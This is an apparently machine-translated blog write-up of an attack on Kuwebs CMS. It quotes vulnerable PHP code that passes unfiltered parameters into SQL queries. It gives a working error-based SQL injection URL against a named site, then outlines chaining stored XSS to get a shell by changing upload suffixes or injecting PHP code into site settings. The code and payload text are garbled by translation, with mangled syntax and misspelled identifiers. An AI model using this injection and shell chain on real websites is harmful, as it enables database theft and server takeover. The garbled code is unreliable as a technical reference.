Kuwebs cms SQL Injection works with xss to getshell

Bored. I tested a website and found that it was the kuwebs source code. Google found that someone had released the vulnerability, but it seems that it was supplemented. Then I downloaded it on the official website, during the download, I was prompted that there was a Trojan. I inserted it. It seems that someone has left the official website of kuwebs with a backdoor... After a simple look, I found an injection point and looked at the code: <? Phprequire_once '.. /inc/common. inc. php '; $ strSql = "select * from {$ configTableHead} job where id =' {$ jobid} 'and lang =' {$ kuWebsiteCurrLanguage }';"; // $ jobid variable is directly queried in the database without any filtering, but there are quotation marks here. If magic is enabled, it cannot be injected. You can consider the mysql GBK width byte injection, west $ kuArrJobInfo = $ dbInstance-> getOne ($ strSql); // $ kuResumePost = $ row ['jobpost']; $ kuPositionId = $ kuArrJobInfo ['type3']? $ KuArrJobInfo ['type3']: ($ kuArrJobInfo ['type2']? $ KuArrJobInfo ['type2']: $ kuArrJobInfo ['type1']); ...... $ arrMenuInfo = getMenuIdInfo ($ menuid); // here is the injection point... $ TopMenuId = ''; if (count ($ kuMenuList [$ kuProductShow ['type3']) $ topMenuId = $ arrMenuInfo ['type3']; else if (count ($ kuMenuList [$ kuProductShow ['type2']) $ topMenuId = $ arrMenuInfo ['type2']; else if (count ($ kuMenuList [$ kuProductShow ['type1']) $ topMenuId = $ arrMenuInfo ['type1']; ...... function description function getMenuIdInfo ($ id) {if (''= $ id | 0> $ id) return; global $ configTableHead, $ kuWebsiteCurr Language, $ dbInstance; $ strSql = "select id, fatherid from {$ configTableHead} menu where id = {$ id };"; $ row1 = $ dbInstance-> getOne ($ strSql); if (! Is_array ($ row1) return; if (0 = intval ($ row1 ['fatherid']) {$ arrInfo ['level'] = 1; $ arrInfo ['type1'] = $ id; $ arrInfo ['type2'] = ''; $ arrInfo ['type3'] =''; return $ arrInfo;} exp: http://www.bkjia.com /Kuwebs/job/resume. php? Jobid = 16 & lang = cn & menuid = 6 and (select 1 from (select count (*), concat (select version () from 'information _ scheme '. tables limit 0, 1), floor (rand (0) * 2) x from 'information _ scheme '. tables group by x) a)> 0: it should end here, But kuwebs is disgusting. You do not change the default Management backend path, it will prompt you to change the path, so there is usually a password, no holes in it, and it cannot be shot. Now that XSS is popular, I am also popular. Find out xss and find that there is a stored xss in the website message. Then I read the code and did not filter it. Finally, I used shell, it's easy to use shell. You can directly modify the configuration of the upload suffix, or directly use shell at website basic Settings> basic information> {$ {phpinfo ()}.